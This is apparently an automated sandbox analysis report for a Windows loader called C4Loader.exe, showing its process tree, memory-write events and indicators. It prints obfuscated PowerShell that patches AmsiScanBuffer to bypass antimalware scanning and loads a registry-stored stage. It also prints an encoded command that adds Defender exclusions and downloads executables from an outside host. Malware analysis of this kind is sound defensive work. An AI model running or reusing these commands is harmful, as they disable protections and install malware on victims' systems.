SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe Token: 34 2040 powershell.exe Token: 35 2040 powershell.exe Token: 36 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe Token: 34 2040 powershell.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
svchost.exepid process 2680 svchost.exe 2680 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C4Loader.exevbc.exepowershell.execmd.exeSmartDefRun.exepowershell.exenew2.execmd.exedescription pid process target process PID 1064 wrote to memory of 4240 1064 C4Loader.exe vbc.exe PID 1064 wrote to memory of 4240 1064 C4Loader.exe vbc.exe PID 1064 wrote to memory of 4240 1064 C4Loader.exe vbc.exe PID 1064 wrote to memory of 3900 1064 C4Loader.exe vbc.exe PID 1064 wrote to memory of 3900 1064 C4Loader.exe vbc.exe PID 1064 wrote to memory of 3900 1064 C4Loader.exe vbc.exe PID 1064 wrote to memory of 3900 1064 C4Loader.exe vbc.exe PID 1064 wrote to memory of 3900 1064 C4Loader.exe vbc.exe PID 3900 wrote to memory of 4704 3900 vbc.exe powershell.exe PID 3900 wrote to memory of 4704 3900 vbc.exe powershell.exe PID 3900 wrote to memory of 4704 3900 vbc.exe powershell.exe PID 4704 wrote to memory of 2212 4704 powershell.exe C4Loader.exe PID 4704 wrote to memory of 2212 4704 powershell.exe C4Loader.exe PID 4704 wrote to memory of 2212 4704 powershell.exe C4Loader.exe PID 4704 wrote to memory of 5004 4704 powershell.exe new2.exe PID 4704 wrote to memory of 5004 4704 powershell.exe new2.exe PID 4704 wrote to memory of 5004 4704 powershell.exe new2.exe PID 4704 wrote to memory of 3444 4704 powershell.exe SysApp.exe PID 4704 wrote to memory of 3444 4704 powershell.exe SysApp.exe PID 4704 wrote to memory of 3444 4704 powershell.exe SysApp.exe PID 4704 wrote to memory of 2032 4704 powershell.exe SmartDefRun.exe PID 4704 wrote to memory of 2032 4704 powershell.exe SmartDefRun.exe PID 4160 wrote to memory of 3208 4160 cmd.exe sc.exe PID 4160 wrote to memory of 3208 4160 cmd.exe sc.exe PID 4160 wrote to memory of 4024 4160 cmd.exe sc.exe PID 4160 wrote to memory of 4024 4160 cmd.exe sc.exe PID 4160 wrote to memory of 5096 4160 cmd.exe sc.exe PID 4160 wrote to memory of 5096 4160 cmd.exe sc.exe PID 4160 wrote to memory of 1988 4160 cmd.exe sc.exe PID 4160 wrote to memory of 1988 4160 cmd.exe sc.exe PID 4160 wrote to memory of 4388 4160 cmd.exe sc.exe PID 4160 wrote to memory of 4388 4160 cmd.exe sc.exe PID 4160 wrote to memory of 2108 4160 cmd.exe reg.exe PID 4160 wrote to memory of 2108 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4192 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4192 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4008 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4008 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4036 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4036 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4888 4160 cmd.exe reg.exe PID 4160 wrote to memory of 4888 4160 cmd.exe reg.exe PID 2032 wrote to memory of 2436 2032 SmartDefRun.exe dialer.exe PID 3744 wrote to memory of 4912 3744 powershell.exe schtasks.exe PID 3744 wrote to memory of 4912 3744 powershell.exe schtasks.exe PID 5004 wrote to memory of 4460 5004 new2.exe vbc.exe PID 5004 wrote to memory of 4460 5004 new2.exe vbc.exe PID 5004 wrote to memory of 4460 5004 new2.exe vbc.exe PID 5004 wrote to memory of 4460 5004 new2.exe vbc.exe PID 5004 wrote to memory of 4460 5004 new2.exe vbc.exe PID 3684 wrote to memory of 4608 3684 cmd.exe sc.exe PID 3684 wrote to memory of 4608 3684 cmd.exe sc.exe PID 3684 wrote to memory of 5036 3684 cmd.exe sc.exe PID 3684 wrote to memory of 5036 3684 cmd.exe sc.exe PID 3684 wrote to memory of 3212 3684 cmd.exe sc.exe PID 3684 wrote to memory of 3212 3684 cmd.exe sc.exe PID 3684 wrote to memory of 1492 3684 cmd.exe sc.exe PID 3684 wrote to memory of 1492 3684 cmd.exe sc.exe PID 3684 wrote to memory of 3728 3684 cmd.exe sc.exe PID 3684 wrote to memory of 3728 3684 cmd.exe sc.exe PID 3684 wrote to memory of 856 3684 cmd.exe reg.exe PID 3684 wrote to memory of 856 3684 cmd.exe reg.exe PID 3684 wrote to memory of 3920 3684 cmd.exe reg.exe PID 3684 wrote to memory of 3920 3684 cmd.exe reg.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1ee42a25-dfb2-4380-9e6d-c30f0e6a2b42}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:MfWwFyyyKWiB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zHZibhuwBaEAeD,[Parameter(Position=1)][Type]$DrVFYBiSlv)$HTRYDBaviaf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'l'+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+'e'+'g'+''+'a'+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+'ss,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HTRYDBaviaf.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+'d'+'eBy'+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zHZibhuwBaEAeD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');$HTRYDBaviaf.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+',N'+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$DrVFYBiSlv,$zHZibhuwBaEAeD).SetImplementationFlags('Ru'+'n'+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');Write-Output $HTRYDBaviaf.CreateType();}$ATCLPXScUcuCY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+'t'+[Char](46)+'W'+[Char](105)+''+'n'+'3'+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](65)+'TC'+[Char](76)+''+'P'+''+[Char](88)+''+'S'+''+[Char](99)+'Uc'+'u'+''+'C'+''+[Char](89)+'');$vZpdetnudMNGIS=$ATCLPXScUcuCY.GetMethod('v'+[Char](90)+''+[Char](112)+'d'+[Char](101)+'t'+[Char](110)+''+[Char](117)+'d'+[Char](77)+''+[Char](78)+''+[Char](71)+'I'+[Char](83)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ONfjLIxNYCQvdjmfMyh=MfWwFyyyKWiB @([String])([IntPtr]);$wPDHzRhmTxOjZvPvlSmNOp=MfWwFyyyKWiB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bgtgIQDTfJl=$ATCLPXScUcuCY.GetMethod('GetM'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('kerne'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$MScikjDwUpGxHU=$vZpdetnudMNGIS.Invoke($Null,@([Object]$bgtgIQDTfJl,[Object]('L'+'o'+''+'a'+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$VYKtGGiOLBdskzvmU=$vZpdetnudMNGIS.Invoke($Null,@([Object]$bgtgIQDTfJl,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$qGjBlxM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MScikjDwUpGxHU,$ONfjLIxNYCQvdjmfMyh).Invoke(''+'a'+''+'m'+'s'+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$oefKZObKxwRpdDMyV=$vZpdetnudMNGIS.Invoke($Null,@([Object]$qGjBlxM,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+'n'+'B'+''+'u'+''+'f'+''+[Char](102)+''+'e'+'r')));$MVPwtBqZAP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VYKtGGiOLBdskzvmU,$wPDHzRhmTxOjZvPvlSmNOp).Invoke($oefKZObKxwRpdDMyV,[uint32]8,4,[ref]$MVPwtBqZAP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$oefKZObKxwRpdDMyV,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VYKtGGiOLBdskzvmU,$wPDHzRhmTxOjZvPvlSmNOp).Invoke($oefKZObKxwRpdDMyV,[uint32]8,0x20,[ref]$MVPwtBqZAP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'ger')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HOEaShOrllle{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bUdTXrDhNjcZSb,[Parameter(Position=1)][Type]$RhjoWytnXi)$dSDXjVHeSYI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+'e'+'le'+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+'du'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'','Cl'+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$dSDXjVHeSYI.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$bUdTXrDhNjcZSb).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$dSDXjVHeSYI.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$RhjoWytnXi,$bUdTXrDhNjcZSb).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+'M'+''+[Char](97)+'nage'+'d'+'');Write-Output $dSDXjVHeSYI.CreateType();}$VGylFQOdagDXx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+'oso'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'in3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+'s'+'a'+'f'+''+'e'+''+'V'+''+'G'+''+'y'+''+[Char](108)+''+[Char](70)+''+'Q'+''+[Char](79)+''+[Char](100)+''+[Char](97)+''+'g'+'D'+'X'+'x');$sDHxRSkkYBnzNo=$VGylFQOdagDXx.GetMethod(''+[Char](115)+''+[Char](68)+''+[Char](72)+''+[Char](120)+''+'R'+''+'S'+''+[Char](107)+''+[Char](107)+''+'Y'+''+'B'+''+[Char](110)+''+'z'+'N'+'o'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MmwzXVMtnPJtfuTpksy=HOEaShOrllle @([String])([IntPtr]);$NyJhiuAsSxXCPZFgtuiNXe=HOEaShOrllle @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xqHvnoJMKfY=$VGylFQOdagDXx.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Mo'+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$SHEEDTKkWSUJiu=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$xqHvnoJMKfY,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+'Li'+'b'+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$GUhFGZTdkenyupiop=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$xqHvnoJMKfY,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'lP'+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$aqienkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHEEDTKkWSUJiu,$MmwzXVMtnPJtfuTpksy).Invoke(''+[Char](97)+'ms'+[Char](105)+''+'.'+'d'+'l'+''+[Char](108)+'');$LcEyhilKAAGxfQDWm=$sDHxRSkkYBnzNo.Invoke($Null,@([Object]$aqienkl,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+'c'+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$dGjmnDDzeS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GUhFGZTdkenyupiop,$NyJhiuAsSxXCPZFgtuiNXe).Invoke($LcEyhilKAAGxfQDWm,[uint32]8,4,[ref]$dGjmnDDzeS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LcEyhilKAAGxfQDWm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GUhFGZTdkenyupiop,$NyJhiuAsSxXCPZFgtuiNXe).Invoke($LcEyhilKAAGxfQDWm,[uint32]8,0x20,[ref]$dGjmnDDzeS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+'a'+''+[Char](108)+'e'+[Char](114)+'s'+'t'+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAA